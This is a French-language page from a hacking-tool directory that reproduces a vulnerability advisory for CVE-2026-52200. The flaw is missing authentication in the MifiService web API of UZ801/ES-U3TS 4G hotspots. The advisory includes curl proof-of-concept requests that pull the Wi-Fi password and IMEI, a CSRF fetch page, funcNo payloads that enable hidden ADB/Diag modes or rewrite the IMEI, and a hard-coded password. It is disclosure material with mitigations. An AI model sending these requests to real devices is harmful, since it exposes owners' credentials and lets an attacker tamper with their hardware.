Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-52200 — Avis de sécurité détaillant un contrôle d'accès défaillant dans l'API web MifiService des UZ801/ES-U3TS, permettant l'extraction de données non authentifiée, la modification de la configuration et le redémarrage de l'appareil. Inclut des PoC et des mesures d'atténuation. | Kitploit
Outils/GitHubGitHub/lamaper/cve-2026-52200
Sécurité IoTAnalyse des VulnérabilitésExploitationAudit de ConfigurationCollecte d'InformationsSécurité WebTests d'Intrusion
GitHublamaper/cve-2026-52200

CVE-2026-52200

Avis de sécurité détaillant un contrôle d'accès défaillant dans l'API web MifiService des UZ801/ES-U3TS, permettant l'extraction de données non authentifiée, la modification de la configuration et le redémarrage de l'appareil. Inclut des PoC et des mesures d'atténuation.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

UZ801 / ES-U3TS MifiService Contrôle d'accès défaillant

Avis de sécurité et notes techniques concernant un problème de contrôle d'accès défaillant dans l'API de gestion web intégrée exposée par MifiService.apk sur la plateforme mobile Wi-Fi 4G LTE OEM / marque blanche UZ801_v2.1, également commercialisée sous le nom ES-U3TS.

Ce dépôt vise à soutenir une divulgation coordonnée et l'attribution d'un CVE. Il se concentre sur des preuves techniques reproductibles et non exploitées à des fins malveillantes.

Résumé

L'appareil concerné expose un point de terminaison de gestion HTTP basé sur Jetty à l'adresse :

root@kitploit:~
http://192.168.100.1/ajax

Le répartiteur de requêtes backend est implémenté dans :

root@kitploit:~
com.mifiservice.server.AjaxSevlet

Bien que l'interface web présente une page de connexion, le backend n'impose pas de session authentifiée valide côté serveur pour la plupart des fonctions de gestion. Par conséquent, un attaquant sur le réseau adjacent peut directement invoquer des opérations sensibles funcNo sans authentification.

L'impact vérifié comprend :

  • l'extraction du mot de passe Wi-Fi actuel en clair
  • l'extraction de l'IMEI, des informations du firmware, de l'état de la carte SIM et de la configuration réseau
  • l'extraction de la configuration DHCP et du filtrage MAC
  • la modification et la persistance de la configuration de gestion sans authentification
  • le déclenchement d'une réinitialisation de la configuration et d'un redémarrage de l'appareil sans authentification

Des fonctions supplémentaires à haut risque ont été confirmées par analyse statique, notamment :

  • le redémarrage vers le bootloader
  • l'activation des modes USB cachés ADB / Qualcomm Diag et le redémarrage
  • la fonctionnalité non documentée de réécriture de l'IMEI

Portée et dénomination

Le matériel testé semble appartenir à une famille d'appareils OEM / marque blanche. Le fournisseur de développement d'origine exact est actuellement inconnu, et aucun contact de sécurité fiable du fournisseur n'a été identifié jusqu'à présent.

Cet avis utilise donc la dénomination de produit suivante :

  • Plateforme : UZ801_v2.1
  • Alias marketing observé : ES-U3TS
  • Firmware observé : UZ801-V3.4.3
  • Application observée : MifiService.apk
  • Paquet observé : com.mifiservice.hello

Si d'autres marques ou revendeurs sont identifiés comme distribuant le même firmware, la même APK, les mêmes ressources web et le même comportement funcNo, ils doivent être considérés comme des variantes probablement affectées du même code source.

Composant concerné

  • Point de terminaison d'API web /ajax
  • MifiService.apk
  • com.mifiservice.server.AjaxSevlet

Cause racine

Il ne s'agit pas principalement d'un problème d'identifiants par défaut.

La cause racine est un contrôle d'accès défaillant dans l'API backend :

  • aucune session authentifiée côté serveur n'est imposée pour la plupart des requêtes de gestion
  • aucune protection CSRF n'est présente
  • aucune validation Origin n'est présente
  • aucune validation Referer n'est présente
  • aucun cookie de session ou jeton n'est requis pour la plupart des fonctions sensibles

La fonction de connexion existe, mais elle ne fournit pas de limites d'autorisation significatives pour la majorité de l'API de gestion.

Modèle de menace

Vecteur d'attaque principal :

  • attaquant du réseau adjacent connecté au point d'accès de l'appareil

Vecteur d'attaque secondaire :

  • exploitation CSRF / drive-by basée sur le navigateur contre une victime actuellement connectée au réseau local de l'appareil

Il ne s'agit pas par défaut d'une attaque à distance exposée sur Internet. L'attaquant doit soit :

  • avoir une accessibilité directe de couche 2 / couche 3 vers 192.168.100.1, soit
  • contraindre le navigateur d'une victime connectée à envoyer des requêtes vers le point de terminaison de l'appareil

État des preuves

Tous les résultats ci-dessous sont inclus comme fonctionnalités affectées du même problème de contrôle d'accès défaillant.
Lorsque cela est pertinent, chaque élément est explicitement marqué comme :

  • Validé en direct
  • Confirmé par analyse statique

Cette distinction est conservée pour des raisons de précision. Les fonctionnalités à haut risque ne sont pas présentées à tort comme testées en direct lorsqu'elles n'ont pas été intentionnellement exécutées sur du matériel public.

Résultats techniques par groupe de fonctions

Divulgation d'informations sans authentification

Modification de configuration sans authentification

Actions perturbatrices / administratives sans authentification

Fonctionnalités non documentées ou de type maintenance

funcNoDescriptionStatut

Statut du fournisseur

  • Fournisseur d'origine en amont : inconnu
  • Type de produit : plateforme de routeur mobile OEM / marque blanche
  • Contact PSIRT / sécurité fiable : non identifié
  • État actuel de la divulgation : fournisseur injoignable / aucun canal de sécurité fournisseur confirmé

Au moment de la rédaction, l'appareil semble être vendu via des canaux OEM / revendeurs avec une marque incohérente ou absente, et aucun contact fiable avec le fournisseur de développement d'origine n'a été établi.

Exemples de PoC sûrs

Les exemples ci-dessous sont intentionnellement limités à une validation en lecture seule ou à faible impact. Ils sont inclus pour démontrer la vulnérabilité sans fournir un flux d'exploitation armé.

1. Lecture du mot de passe Wi-Fi actuel sans authentification

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1002}' \
  http://192.168.100.1/ajax

Comportement attendu :

  • renvoie du JSON
  • inclut ssid
  • inclut pwd en clair

2. Lecture des informations d'identification de l'appareil sans authentification

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1029}' \
  http://192.168.100.1/ajax

Comportement attendu :

  • renvoie du JSON
  • inclut imei
  • inclut fwversion

3. Démonstration d'un accès en écriture persistant non autorisé à l'aide d'un champ à faible risque

Lecture de la langue actuelle :

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1030}' \
  http://192.168.100.1/ajax

Définition de la langue :

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1031,"Language":"Chinese"}' \
  http://192.168.100.1/ajax

Restaurer la valeur d'origine ensuite.

4. Concept CSRF basé sur le navigateur

Ce point de terminaison n'impose pas d'état de session ni de validation Origin / Referer. Le navigateur d'une victime connectée peut donc être abusé pour envoyer des requêtes en arrière-plan.

Page de démonstration minimale :

root@kitploit:~
<!doctype html>
<meta charset="utf-8">
<script>
fetch("http://192.168.100.1/ajax", {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  body: JSON.stringify({funcNo: 1002})
});
</script>

Cet exemple est intentionnellement limité à un numéro de fonction en lecture seule. Ne le déployez pas contre des utilisateurs ou des appareils de production.

Formats de requêtes non publics / à haut risque

Les formats JSON suivants sont documentés uniquement pour l'analyse défensive et le triage. Ils ne sont pas accompagnés ici d'étapes d'exécution.

2001 - activation des interfaces de débogage cachées

root@kitploit:~
{"funcNo":2001}

Comportement observé dans le code :

  • exécute setprop persist.sys.usb.config rndis,serial_smd,diag,adb
  • exécute sync
  • redémarre l'appareil

2004 - chemin de réécriture de l'IMEI

root@kitploit:~
{"funcNo":2004,"imei":"<redacted-test-value>"}

Comportement observé dans le code :

  • appelle un chemin équivalent à AT+WRIMEI=<value>
  • vérifie le succès via un chemin de relecture de l'IMEI en suivi

Aucun test public en direct n'est inclus ici en raison de préoccupations juridiques, de conformité et d'intégrité de l'appareil.

Extraits de preuves

Exemple de réponse sans authentification pour 1002

root@kitploit:~
{
  "results": [
    {
      "dns1": "8.8.8.8",
      "ssid": "4G-UFI-8E1",
      "dns2": "8.8.8.8",
      "mask": "255.255.255.0",
      "pwd": "1234567890",
      "wlan_ip": "192.168.100.1",
      "IP": "192.168.100.1"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

Exemple de réponse sans authentification pour 1029

root@kitploit:~
{
  "results": [
    {
      "manufacture": "Qualcomm Technology",
      "dbm": "",
      "fwversion": "V3.4.3",
      "imei": "863993064154463"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

Pourquoi c'est un candidat CVE

Ce problème est un candidat CVE solide car il est :

  • reproductible sur un appareil contrôlé par le client
  • accessible par un attaquant du réseau adjacent
  • non dépendant d'une modification physique non documentée
  • pas simplement un problème de mot de passe par défaut
  • impactant sur la confidentialité, l'intégrité et la disponibilité

Classification suggérée :

  • CWE-306 Absence d'authentification pour une fonction critique
  • CWE-862 Absence d'autorisation

CVSS suggéré :

root@kitploit:~
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Statut de divulgation

  • Analyse statique terminée : 2026-05-11
  • Validation en direct terminée : 2026-05-12
  • Préparation du contact fournisseur terminée : 2026-05-12
  • Projet d'avis public préparé : 2026-05-12

Mesures d'atténuation

  • exiger une session authentifiée valide côté serveur pour toutes les fonctions de gestion
  • rejeter toutes les requêtes funcNo sensibles sans authentification
  • ajouter une protection CSRF
  • valider Origin et Referer
  • supprimer les points de terminaison de maintenance non documentés des builds de production
  • ne jamais exposer les identifiants Wi-Fi via des réponses API non authentifiées

Avis juridique et de sécurité

Ce dépôt est destiné à la recherche défensive, à la divulgation de vulnérabilités et à la coordination. Les exemples publics sont intentionnellement limités à une validation à faible risque. Les fonctionnalités à haut risque sont documentées uniquement dans la mesure nécessaire à la remédiation et au triage CVE.

Télécharger l’outil
funcNoDescriptionStatutNotes
1002Lecture du SSID, de l'IP de l'appareil, du DNS, du mot de passe Wi-FiValidé en directRenvoie le mot de passe Wi-Fi en clair
1009Lecture du mode de chiffrement Wi-Fi et du mot de passeValidé en directRenvoie le mot de passe Wi-Fi en clair
1011Lecture de la plage DHCP, du DNS, de la liste des clientsValidé en directUtile pour la reconnaissance locale
1015Lecture de l'état de la carte SIMValidé en directRenvoie l'état de la SIM
1029Lecture de l'IMEI, du firmware, du fabricant, des informations de signalValidé en directRenvoie l'identité sensible de l'appareil
1052Lecture du mode de filtrage MAC et des entrées configuréesValidé en directDivulgue la politique et les emplacements configurés
2002Lecture de l'emplacement SIM actifValidé en directExpose l'état d'exécution
funcNoDescriptionStatutNotes
1004Modification du mode de connexionConfirmé statiquementAucune imposition de session observée
1005Modification du mode réseau préféréConfirmé statiquementImpact opérationnel élevé
1007Modification du SSID / nombre maximal de stationsConfirmé statiquementPersiste la configuration et redémarre la logique AP
1010Modification du mode de chiffrement Wi-Fi / mot de passeConfirmé statiquementImpact élevé sur la confidentialité
1012Modification des paramètres liés au DHCP/DNSConfirmé statiquementAltération du réseau local
1016/1017/1018Lecture / définition / basculement du profil APNConfirmé statiquementModification du comportement WAN
1031Modification de la langue et persistanceValidé en directUtilisé comme preuve d'accès en écriture à faible risque
1053/1054/1055Modification du comportement et des entrées du filtrage MACConfirmé statiquementAltération du contrôle d'accès réseau
funcNoDescriptionStatutNotes
1013Redémarrage de l'appareilValidé en directDoS / interruption de service
1014Réinitialisation de la configuration application/réseau et redémarrageValidé en directPas d'effacement complet des données utilisateur Android
2000Redémarrage vers le bootloaderValidé en directImpact opérationnel élevé
2001Activation de la configuration USB cachée ADB/Diag et redémarrageConfirmé statiquementChemin de maintenance dangereux
Notes
2003Chemin de mot de passe de maintenance cachéConfirmé statiquementUtilise le mot de passe codé en dur admin8888 ; le comportement semble partiel / résiduel
2004Réécriture de l'IMEIConfirmé statiquementAppelle le chemin de commande AT ; non exécuté publiquement